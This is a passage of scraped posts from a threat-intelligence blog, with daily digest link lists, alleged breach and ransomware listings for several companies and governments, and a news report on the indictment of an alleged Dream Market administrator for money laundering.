](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/823768598273648972365897263598723589763.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Daily Dose of Dark Web Informer - May 13th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-13th-2026/ Last updated: 2026-05-13T22:37:06.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Akitatek Allegedly Breached Exposing 5,400 Customer Records From the French IT Services and Electronics Repair Company](https://darkwebinformer.com/akitatek-allegedly-breached-exposing-5-400-customer-records-from-the-french-it-services-and-electronics-repair-company/) FREE ❗️ [Ministry of Health of Vietnam Allegedly Breached Exposing 480,000 Medical Staff Records From the Vietnamese Government Health Authority](https://darkwebinformer.com/ministry-of-health-of-vietnam-allegedly-breached-exposing-480-000-medical-staff-records-from-the-vietnamese-government-health-authority/) FREE ❗️ [SIVVI Allegedly Breached: Approximately 300,000 Customer Records Reposted From the Dubai-Based Fashion E-Commerce Platform](https://darkwebinformer.com/sivvi-allegedly-breached-approximately-300-000-customer-records-reposted-from-the-dubai-based-fashion-e-commerce-platform/) FREE ❗️ [NTN Bearing Corporation of America Allegedly Hit by PayoutsKing Ransomware: 596 GB Exfiltrated From the American Ball and Roller Bearing Manufacturer, Including US Army JLTV Program Documents](https://darkwebinformer.com/ntn-bearing-corporation-of-america-allegedly-hit-by-payoutsking-ransomware-596-gb-exfiltrated-from-the-american-ball-and-roller-bearing-manufacturer-including-us-army-jltv-program-docum/) FREE ❗️ [German National Indicted Over Money Laundering Tied to Defunct "Dream Market" Darknet Marketplace](https://darkwebinformer.com/german-national-indicted-over-money-laundering-tied-to-defunct-dream-market-darknet-marketplace/) FREE X/Twitter Updates ❗️ [SMIDA allegedly breached: 327,000 credentials exposed from the Ukrainian Stock Market Infrastructure Development Agency](https://x.com/DarkWebInformer/status/2054569628697841957?s=20) ❗️ [Consorcio Credicard allegedly breached: 5,000,000+ records exposed from the Venezuelan credit card processing consortium](https://x.com/DarkWebInformer/status/2054577847881068577?s=20) ❗️ [Breached announces Partnership Program launch with tiered benefits and IntelVault integration](https://x.com/DarkWebInformer/status/2054582036724105505?s=20) ❗️ [Mistral AI allegedly breached: \~5GB of internal source code and \~450 private repositories exposed from the French AI company by TeamPCP](https://x.com/DarkWebInformer/status/2054584505172668754?s=20) ❗️ [Breached and TeamPCP announce supply chain attack competition with $1,000 USD prize and open-sourced Shai Hulud worm](https://x.com/DarkWebInformer/status/2054590267252940870?s=20) ❗️ [FOXCONN has fallen victim to Nitrogen Ransomware](https://x.com/DarkWebInformer/status/2054613247941038255?s=20) 💡 [Guy had 5 BTC locked away over 11 years ago after changing the password stoned in college and Claude was able to recover it.](https://x.com/DarkWebInformer/status/2054620333928309214?s=20) ❗️ [District Health Information Software (DHIS2) allegedly breached: access shared to national health systems across more than 30 countries serving 3.2 billion people](https://x.com/DarkWebInformer/status/2054626630048629149?s=20) 💡 [Hey @vxunderground you made TechCrunch.](https://x.com/DarkWebInformer/status/2054627148682428830?s=20) ❗️ [Thales Group allegedly breached: 6,400 user records exposed from the French defense, aerospace, and digital identity multinational](https://x.com/DarkWebInformer/status/2054634752649404711?s=20) ❗️ [1/2LibrePass allegedly advertised as anonymous company registration, offshore incorporation, and crypto license service operating since 2012](https://x.com/DarkWebInformer/status/2054641905124733273?s=20) 💡 [I am testing some new notification features on the threat feed to reduce excessive noise and alert fatigue. These and maybe 1 or 2 more will be available either on Friday or Saturday once I have had enough time to test and resolve some UI and UX issues. Settings continue to save](https://x.com/DarkWebInformer/status/2054657964099649745?s=20) 💡 [Woah](https://x.com/DarkWebInformer/status/2054663887962677704?s=20) ❗️ [Mistral AI has confirmed they were impacted by the recent TanStack supply chain attack.](https://x.com/DarkWebInformer/status/2054683350468596166?s=20) ❗️ [Silergy Corp has been claimed a victim to INC Ransom Ransomware](https://x.com/DarkWebInformer/status/2054685318914212094?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### German National Indicted Over Money Laundering Tied to Defunct "Dream Market" Darknet Marketplace URL: https://darkwebinformer.com/german-national-indicted-over-money-laundering-tied-to-defunct-dream-market-darknet-marketplace/ Last updated: 2026-05-13T20:07:04.000Z Federal prosecutors have charged Owe Martin Andresen, a 49-year-old German citizen believed to have served as the lead administrator of the once-massive darknet marketplace Dream Market, with laundering more than $2 million in proceeds tied to the site's commission accounts. German authorities arrested Andresen last week on parallel charges of their own. According to U.S. Attorney Theodore S. Hertzberg, Andresen is accused of funneling commissions generated from the sale of illicit narcotics, stolen personal data, forged identity documents, and other contraband through a series of cryptocurrency wallets, and even converting a sizable share of the proceeds into physical gold bars. Hertzberg credited cooperation between U.S. and German investigators for making the dual prosecution possible. Kareem Carter, who leads the IRS Criminal Investigation Cyber Crimes Unit in Washington, D.C., said the case underscores how digital criminals leave behind traceable financial trails no matter how long they remain dormant. DEA Miami Special Agent in Charge Miles Aley added that traffickers have increasingly leaned on technology to push narcotics into communities, and that law enforcement is determined to shut those avenues down. #### A marketplace built on Tor and crypto Dream Market first appeared online in 2013 and grew into one of the largest illegal marketplaces ever to operate on the dark web, often hosting close to 100,000 active listings. Over its six-year run, court filings allege it facilitated the sale of staggering quantities of drugs, including roughly 90 kilograms of heroin, 450 kilograms of cocaine, 25 kilograms of crack, 45 kilograms of methamphetamine, 13 kilograms of oxycodone, and 36 kilograms of fentanyl. Both buyers and vendors used the Tor anonymity network to reach the site and relied on cryptocurrency to obscure their transactions, a combination that fueled the marketplace's rapid growth. Earlier investigations brought down several figures who helped run the platform. Administrators known online as "Oxymonster" and "KITT3N" were convicted in cases handled by the U.S. Attorney's Office for the Southern District of Florida and the Justice Department's Computer Crime and Intellectual Property Section. A mid-level moderator who went by "GOWRON" was prosecuted in the United Kingdom. But the marketplace's top administrator, known only by the handle "Speedstepper," remained unidentified for years. When law enforcement scrutiny intensified in 2019, Dream Market's operators announced they were closing the site voluntarily. The cryptocurrency wallets holding the administrators' commissions, however, were left largely untouched. #### Dormant wallets reactivated According to the indictment, those wallets came back to life in late 2022, when Andresen allegedly accessed them and moved the contents into newly consolidated crypto wallets, a transfer that prosecutors say could only have been carried out by someone holding Dream Market's original private keys, pointing investigators toward "Speedstepper." Several months later, in August 2023, Andresen is alleged to have used an Atlanta-based crypto service to buy gold bars from international suppliers, instructing the sellers to ship them to his home in Germany. German investigators uncovered additional laundering activity on their side of the Atlantic. Altogether, prosecutors say Andresen laundered over $2 million between August 2023 and April 2025. On May 7, German and U.S. authorities executed a coordinated operation, arresting Andresen and searching three locations. Investigators seized approximately $1.7 million worth of gold bars said to have been bought with Dream Market funds, more than $23,000 in cash, and records pointing to bank accounts and crypto wallets holding roughly another $1.2 million believed to be Dream Market proceeds. #### The charges A federal grand jury in the Northern District of Georgia returned the indictment on January 13, 2026\. Andresen faces six counts of international concealment money laundering and six counts of concealment money laundering. Each U.S. count carries a maximum penalty of 20 years in prison. German authorities have filed several concealment money laundering charges of their own, each punishable by up to five years. As with any indictment, the charges are allegations, and Andresen is presumed innocent unless and until convicted at trial. The case is being investigated by the IRS Criminal Investigation Cyber Crimes Unit and the DEA Miami Counternarcotic Cyber Investigations Task Force, with significant help from German partners including the Bundeskriminalamt Cybercrime Unit and the Zentrale Kriminalinspektion Oldenburg. The original Dream Market probe, which ran from 2016 to 2022, was led by a multi-agency task force that included the DEA, IRS-CI, USPIS, FBI, Homeland Security Investigations, and the Fort Lauderdale Police Department. Assistant U.S. Attorney Bethany L. Rupert is prosecuting the current case, with assistance from the Justice Department's Office of International Affairs. Source: ### NTN Bearing Corporation of America Allegedly Hit by PayoutsKing Ransomware: 596 GB Exfiltrated From the American Ball and Roller Bearing Manufacturer, Including US Army JLTV Program Documents URL: https://darkwebinformer.com/ntn-bearing-corporation-of-america-allegedly-hit-by-payoutsking-ransomware-596-gb-exfiltrated-from-the-american-ball-and-roller-bearing-manufacturer-including-us-army-jltv-program-docum/ Last updated: 2026-05-13T18:42:54.000Z Ransomware · United States # NTN Bearing Corporation of America Allegedly Hit by PayoutsKing Ransomware: 596 GB Exfiltrated From the American Ball and Roller Bearing Manufacturer, Including US Army JLTV Program Documents A threat actor operating under the PayoutsKing brand (self-described as “Not RaaS”) has listed NTN Bearing Corporation of America on its extortion leak site, claiming to have exfiltrated 596 GB of data from the American manufacturer, a subsidiary of the global bearing maker NTN Corporation with revenue of $1.5B and approximately 4,700 employees. The dump reportedly includes drawings and 3D models for the US Army’s Joint Light Tactical Vehicle (JLTV) Family of Vehicles (FoV) Program, along with approximately 100 PDF files marked under DoD Directive 5230.25\. The actor cites potential liability of up to $1.2 million per violation (per file or per person accessed) and an additional $1 million corporate violation penalty. Post details Actor(s)PayoutsKing Group SectorManufacturing / Industrial Bearings / Defense Supply Chain TypeRansomware / Extortion Listing Records596 GB total, PII for 7,500+ employees CountryUnited States Date11/05/2026 (countdown ends in 6 days, 23 hours from screenshot) Compromised data - Drawings and 3D models for the Joint Light Tactical Vehicle (JLTV) Family of Vehicles (FoV) Program for the US Army - Approximately 100 PDF files marked within DoD Directive 5230.25 - Personal data for 7,500+ employees, priced at up to $2,500 per person - Financial statements - Quality testing reports - Contracts - Confidential documents - Employees’ PII (Personally Identifiable Information) - Internal correspondence - Financial records - Engineering data - Contracts, agreements, and NDAs - Liability cited at up to $1.2 million per violation per file or per person accessed, plus up to $1 million corporate violation penalty Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6239875698235769823765982736549871.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6239875698235769823765982736549871.png) Want the non-blurred screenshots? Subscribe and check out the threat feed and/or ransomware feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### SIVVI Allegedly Breached: Approximately 300,000 Customer Records Reposted From the Dubai-Based Fashion E-Commerce Platform URL: https://darkwebinformer.com/sivvi-allegedly-breached-approximately-300-000-customer-records-reposted-from-the-dubai-based-fashion-e-commerce-platform/ Last updated: 2026-05-13T16:57:56.000Z Breach Report · United Arab Emirates # SIVVI Allegedly Breached: Approximately 300,000 Customer Records Reposted From the Dubai-Based Fashion E-Commerce Platform A threat actor is reposting the previously reported SIVVI database for sale, listing approximately 300,000 UAE customer records from the Dubai-based fashion e-commerce platform founded in 2014 and now owned by noon. The dataset is described as a multi-table relational structure suitable for data analysis and structural research. Post details Actor(s)\[Citizen\] Moelester SectorRetail / Fashion E-Commerce TypeData Sale (repost) Records\~300,000 UAE customers CountryUnited Arab Emirates Date11/05/2026 Compromised data Users Core Table - user\_id, email, phone\_number, status, created\_at, last\_login, account\_type Customer Profile - user\_id, full\_name, gender, age\_group, country, city, customer\_segment, lifetime\_value, average\_order\_value, last\_order\_date Behavior Tracking (Events) - event\_id, user\_id, event\_type, product\_id, event\_value, timestamp Segmentation Table - user\_id, segment, reason, updated\_at Engagement Metrics - user\_id, total\_sessions, avg\_session\_time\_minutes, cart\_abandon\_rate, email\_open\_rate, push\_notification\_opt\_in Loyalty Integration - user\_id, loyalty\_points, tier, points\_earned, points\_redeemed, last\_updated Marketing Campaigns - campaign\_id, campaign\_name, target\_segment, channel, start\_date, end\_date, status Campaign Results - campaign\_id, sent\_users, open\_rate, click\_rate, conversion\_rate, revenue\_generated Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6725384897231987235698726358792387951.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6725384897231987235698726358792387951.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6725384897231987235698726358792387952.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/6725384897231987235698726358792387952.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Ministry of Health of Vietnam Allegedly Breached Exposing 480,000 Medical Staff Records From the Vietnamese Government Health Authority URL: https://darkwebinformer.com/ministry-of-health-of-vietnam-allegedly-breached-exposing-480-000-medical-staff-records-from-the-vietnamese-government-health-authority/ Last updated: 2026-05-13T16:34:17.000Z Breach Report · Vietnam # Ministry of Health of Vietnam Allegedly Breached Exposing 480,000 Medical Staff Records From the Vietnamese Government Health Authority A threat actor claims to have exfiltrated a database from the Ministry of Health of Vietnam containing over 480,000 sensitive records, including the personal data of doctors, nurses, and medical staff. The actor, identifying as the founder of “FEMBOYSec Intelligence Team,” has issued a warning to the Vietnamese government to negotiate for the protection of the data and threatens to sell the records to third-party buyers if no agreement is reached. A first batch has already been published as a public download. Post details Actor(s)KurdFemboys (FEMBOYSec Intelligence Team) SectorGovernment / Healthcare TypeData Leak with Extortion Threat Records480,000+ CountryVietnam Date11/05/2026 Compromised data - ID, full name, gender, date of birth - Place of origin, ethnicity, nationality - Document type, document number, document issue date, document issuing authority - Residential address, province, city, district, ward, commune - Phone number, email - Affiliated unit, current workplace - Requested scope of practice, practice certificate code, practice certificate issue date, practice certificate issuing place - Practice certificate signatory and position of certificate signatory - Practice information, scope of practice on certificate - Qualification number, qualification issue date - Educational institution, education level, form of training - Health facility name, position, department - Practice duration, working duration, total time - Job description, appraisal result, appraisal reason, appraisal scope of practice - Specific scope of practice - Disciplinary form, discipline date, discipline effective from, discipline effective until, discipline signatory, discipline content - Application type, subject category - Submitting entity, receiving agency, submission date - Data entry clerk, position of entry clerk, internal code Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/978235987234697256987236549782359876234879523.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/978235987234697256987236549782359876234879523.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Akitatek Allegedly Breached Exposing 5,400 Customer Records From the French IT Services and Electronics Repair Company URL: https://darkwebinformer.com/akitatek-allegedly-breached-exposing-5-400-customer-records-from-the-french-it-services-and-electronics-repair-company/ Last updated: 2026-05-13T16:14:29.000Z Breach Report · France # Akitatek Allegedly Breached Exposing 5,400 Customer Records From the French IT Services and Electronics Repair Company A threat actor is leaking the customer database of Akitatek, a French IT services and electronics repair company. The dataset is published as a 1 MB JSON file containing 5,400 customer entries with full names, addresses, and phone numbers, with sample records showing customers in Montreuil (93100) and Rully (60810). Post details Actor(s)ChimeraZ SectorIT Services / Electronics Repair TypeData Leak FormatJSON (1 MB) Records5,400 CountryFrance Date11/05/2026 Compromised data - Customer ID - Address label (nomAdresse, e.g., “Chez moi”) - First name (prenom) - Last name (nom) - Street address (adresse) - Address complement (complement) - Postal code (codePostal) - City (ville) - Mobile phone (telephonePortable) - Landline phone (telephoneFixe) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1298273598273569812468712569871249781.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1298273598273569812468712569871249781.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1298273598273569812468712569871249782.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/1298273598273569812468712569871249782.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Daily Dose of Dark Web Informer - May 12th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-12th-2026/ Last updated: 2026-05-12T23:06:01.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Public Authority for Civil Information Allegedly Breached Exposing 5.23 Million Kuwaiti Citizen Records From the Kuwaiti Government Identity Authority](https://darkwebinformer.com/public-authority-for-civil-information-allegedly-breached-exposing-5-23-million-kuwaiti-citizen-records-from-the-kuwaiti-government-identity-authority/) FREE ❗️ [FutureShop Egypt Allegedly Breached Exposing Thousands of Customer, Order, and Delivery Records From the Egyptian Grocery Delivery Platform](https://darkwebinformer.com/futureshop-egypt-allegedly-breached-exposing-thousands-of-customer-order-and-delivery-records-from-the-egyptian-grocery-delivery-platform/) FREE X/Twitter Updates 💡 [Looks like Instructure made payment to ShinyHunters](https://x.com/DarkWebInformer/status/2054218683539485074?s=20) ❗️ [MBet allegedly breached exposing 200,000+ KYC documents and 300,000+ PII records from the Brazilian online casino and sports betting platform](https://x.com/DarkWebInformer/status/2054223616854638939?s=20) ❗️ [Nightmare-Eclipse has just released two new GitHub repositories... Same user behind RedSun, UnDefend, BlueHammer](https://x.com/DarkWebInformer/status/2054229813947211975?s=20) ❗️ [SIVVI allegedly breached exposing approximately 300,000 customer records from the Dubai-based fashion e-commerce platform](https://x.com/DarkWebInformer/status/2054233679845617896?s=20) ❗️ [BPJS Ketenagakerjaan Kota Metro allegedly leaked exposing personal data of RT, RW, and LPM neighborhood officials in Karangrejo, North Metro, Indonesia](https://x.com/DarkWebInformer/status/2054237263668666757?s=20) ❗️ [ShinyHunters confirms their clearnet domain was suspended and it is no longer operated or owned by them anymore.](https://x.com/DarkWebInformer/status/2054238443337638375?s=20) 💡 [How dumb can you be...](https://x.com/DarkWebInformer/status/2054251934035378476?s=20) ❗️ [A threat actor is selling a private cloud-hosted collection of stealer logs totaling 988.7 GB across more than 10,080 files in URL:Login:Password format.](https://x.com/DarkWebInformer/status/2054254906555425141?s=20) ❗️ [313 Team is claiming to target Spotify](https://x.com/DarkWebInformer/status/2054261639797444682?s=20) ❗️ [PGP Signed message and the repos now have information:](https://x.com/DarkWebInformer/status/2054264278044000262?s=20) ❗️ [TeamPCP has open sourced Shai-Hulud](https://x.com/DarkWebInformer/status/2054239385709662536?s=20) ❗️ [Note: This a repost from the leak by threat actor "breach3d." This actor is asking for a $20,000 ransom. It is not verified if anything in this leak differs from the previous leak in April.](https://x.com/DarkWebInformer/status/2054276487050907914?s=20) ❗️ [OHNO allegedly breached exposing Telegram user IDs, crypto wallets, and private keys from the on-chain trading automation platform](https://x.com/DarkWebInformer/status/2054294823868252504?s=20) ❗️ [AIM Smarter allegedly breached exposing 6,500+ business records from the UK promotional products and marketing distribution group](https://x.com/DarkWebInformer/status/2054296778174837051?s=20) 💡 [Bruh](https://x.com/DarkWebInformer/status/2054304733955842317?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### FutureShop Egypt Allegedly Breached Exposing Thousands of Customer, Order, and Delivery Records From the Egyptian Grocery Delivery Platform URL: https://darkwebinformer.com/futureshop-egypt-allegedly-breached-exposing-thousands-of-customer-order-and-delivery-records-from-the-egyptian-grocery-delivery-platform/ Last updated: 2026-05-12T17:48:55.000Z Breach Report · Egypt # FutureShop Egypt Allegedly Breached Exposing Thousands of Customer, Order, and Delivery Records From the Egyptian Grocery Delivery Platform A threat actor claims to have breached FutureShop Egypt, an Egyptian grocery delivery platform, by exploiting an entirely exposed API that required no authentication. The actor states the breach exposed full customer profiles, order histories, delivery addresses, and admin panel data linking customers to specific partnered grocery stores. Sample data references include named stores such as Hyper Market, Khodrawat Super Tawfeer, Zad Land, Muluk Al Kebda, and Al Sajq, with order timestamps spanning October 2025 to May 2026. Post details Actor(s)\[Citizen\] cc5ab SectorE-Commerce / Grocery Delivery TypeData Breach (unauthenticated API exposure) FormatAPI JSON dump PriceFree (shared via Telegram channel) Records3,893 customers, 5,181 orders, 2,438 delivery addresses, 643 active store orders CountryEgypt Date11/05/2026 Compromised data Customer records 3,893 - Full names in Arabic and English - Verified Egyptian phone numbers (+20) - Real email addresses (yahoo.com, gmail.com, hotmail.com) - Account creation dates - Active statuses - User IDs Order records 5,181 - Order numbers - Prices in Egyptian Pounds (EGP) - Delivery notes including customer phone numbers - Order statuses (Submitted, Canceled, Delivered) - Timestamps spanning October 2025 to May 2026 Delivery addresses 2,438 - Apartment numbers - Building numbers - Street names in Arabic - Landmarks - GPS coordinates - Full formatted addresses across Cairo and other Egyptian cities Active store orders (admin panel) 643 - Customer phone numbers - Partnered store names (Hyper Market, Khodrawat Super Tawfeer, Zad Land, Muluk Al Kebda, Al Sajq) - Order prices up to 2,900 EGP - Waiting times - Delivery statuses Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/427938459876235987623598726598723658791.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/427938459876235987623598726598723658791.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Public Authority for Civil Information Allegedly Breached Exposing 5.23 Million Kuwaiti Citizen Records From the Kuwaiti Government Identity Authority URL: https://darkwebinformer.com/public-authority-for-civil-information-allegedly-breached-exposing-5-23-million-kuwaiti-citizen-records-from-the-kuwaiti-government-identity-authority/ Last updated: 2026-05-12T17:08:40.000Z Breach Report · Kuwait # Public Authority for Civil Information Allegedly Breached Exposing 5.23 Million Kuwaiti Citizen Records From the Kuwaiti Government Identity Authority A threat actor claims to have breached the Public Authority for Civil Information (PACI) of Kuwait, the government body responsible for citizen identity, population statistics, and mapping data. The actor states the breach compromised all primary systems of the agency, including the Kuwaiti Population Statistics System, Identity Issuance System, Deceased Records System, Kuwaiti Mapping System, and the Kuwait Mobile ID application. The actor frames the operation as a direct response to alleged aggression against Iraqi fishermen in Iraqi territorial waters and warns of further attacks against any state seen as overstepping against Iraqi sovereignty. The actor also claims to have already executed destructive actions, including the deletion of maps belonging to the Kuwaiti Ministry of Health, and is selling the data to a maximum of 12 buyers for $1,000 USD. Post details Actor(s)\[Citizen\] 0cx00iq SectorGovernment / Civil Registry / Identity TypeData Breach / Data Sale (limited buyers) / Destructive Attack FormatNot specified (multi-system dump) Price$1,000 USD (limited to 12 buyers) Records5,230,000 ID photos plus full primary system data CountryKuwait Date11/05/2026 Compromised data - Civil IDs: full identification records for all Kuwaiti citizens - Traffic Maps: comprehensive traffic and infrastructure mapping - Military Maps: sensitive military geographic data of Kuwait - Residential Data: house locations, owner names, and contact numbers - Statistics Bureau Data: full demographic data on all Kuwaiti citizens and families - Death Records: data on deceased Kuwaitis from 1980 until May 12, 2026 - ID Photos: images of all Kuwaiti IDs (5.23 million records) - Kuwaiti Population Statistics System (full system compromise) - Identity Issuance System (full system compromise) - Deceased Records System (full system compromise) - Kuwaiti Mapping System (full system compromise) - Kuwait Mobile ID application (full system compromise) - Ministry of Health mapping data (reportedly deleted by the actor as a destructive action) Screenshots [ ![Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72358972398756298735698273569872359782.png) 01 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72358972398756298735698273569872359782.png) [ ![Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72358972398756298735698273569872359783.png) 02 ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/72358972398756298735698273569872359783.png) Want the non-blurred screenshots? Subscribe and check out the threat feed section. [darkwebinformer.com/pricing](https://darkwebinformer.com/pricing/) ### Daily Dose of Dark Web Informer - May 11th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-may-11th-2026/ Last updated: 2026-05-11T22:42:02.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience. [ View details](https://darkwebinformer.com/advertising) 56.2k Unique Visitors 122.1k Pageviews Last 30 days as of May 11, 2026\. Next update June 11th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources ## 🧾 Today's Intelligence Threat Intelligence ❗️ [German Authorities Shut Down Revived "Crimenetwork" Platform, Arrest Operator on Mallorca](https://darkwebinformer.com/german-authorities-shut-down-revived-crimenetwork-platform-arrest-operator-on-mallorca/) FREE ❗️ [Mansoura University Allegedly Leaked Exposing 731 Contact Records From the Egyptian Academic Institution](https://darkwebinformer.com/mansoura-university-allegedly-leaked-exposing-731-contact-records-from-the-egyptian-academic-institution/) FREE 📰 [Google Threat Intelligence Group Reports First Known AI-Developed Zero-Day Exploit](https://darkwebinformer.com/google-threat-intelligence-group-reports-first-known-ai-developed-zero-day-exploit/) FREE ❗️ [SAWTAD Allegedly Leaked Exposing 2,211 Files (2.19 GB) of SAW Sensor Diaper Tech R&D and SPMet Metrology Archive](https://darkwebinformer.com/sawtad-allegedly-leaked-exposing-2-211-files-2-19-gb-of-saw-sensor-diaper-tech-r-d-and-spmet-metrology-archive/) FREE ❗️ [KAMS PARIS Allegedly Breached Exposing 187,927 Customer Records From the French Niche Perfumery](https://darkwebinformer.com/kams-paris-allegedly-breached-exposing-187-927-customer-records-from-the-french-niche-perfumery/) FREE X/Twitter Updates ❗️ [Poder Judicial del Estado de Tabasco allegedly leaked exposing 11,741 worker records from the Mexican state judicial body](https://x.com/DarkWebInformer/status/2053851951352193232?s=20) 💡 [Possible ShinyHunters clearnet domain seizure as of about 7 hours ago detected by my FBI Watchdog script.](https://x.com/DarkWebInformer/status/2053854498875977843?s=20) ❗️ [CalendrIDEL allegedly leaked exposing 1,400 user records from the French independent nurses platform](https://x.com/DarkWebInformer/status/2053859796420325813?s=20) 💡 [Interesting find.](https://x.com/DarkWebInformer/status/2053860734199648406?s=20) 💡 [Looks like the domain was indeed suspended by the registrar as of now. I will follow up if anything more comes of it. The Pay or Leak portal is still online.](https://x.com/DarkWebInformer/status/2053864091039470068?s=20) ❗️ [InterLAB allegedly breached exposing data from 30 Mexican laboratories via compromised server](https://x.com/DarkWebInformer/status/2053882418931651005?s=20) ❗️ [1/2 BLS International allegedly breached exposing 29 million records, source code, and SSH keys from the Indian visa services giant](https://x.com/DarkWebInformer/status/2053886693619404997?s=20) ❗️ [](https://x.com/DarkWebInformer/status/2053893472193773616?s=20)[familybox.store](http://familybox.store) allegedly breached exposing 1,100,000 PII records from the Venezuelan online supermarket 💡 [I pushed a fix to the threat feed that was causing searches to not show that the data was actually loading, even though it was eventually showing results. You may need to hard refresh the page: CTRL+SHIFT+R.](https://x.com/DarkWebInformer/status/2053898787836342518?s=20) ❗️ [Emergia Contact Center allegedly breached exposing 12 TB of data from the Colombian/Spanish BPO and 75 client companies](https://x.com/DarkWebInformer/status/2053907157679063425?s=20) 💡 [Playground Games, the publisher of Forza Horizon 6 made a statement that they are taking action against individuals found to be 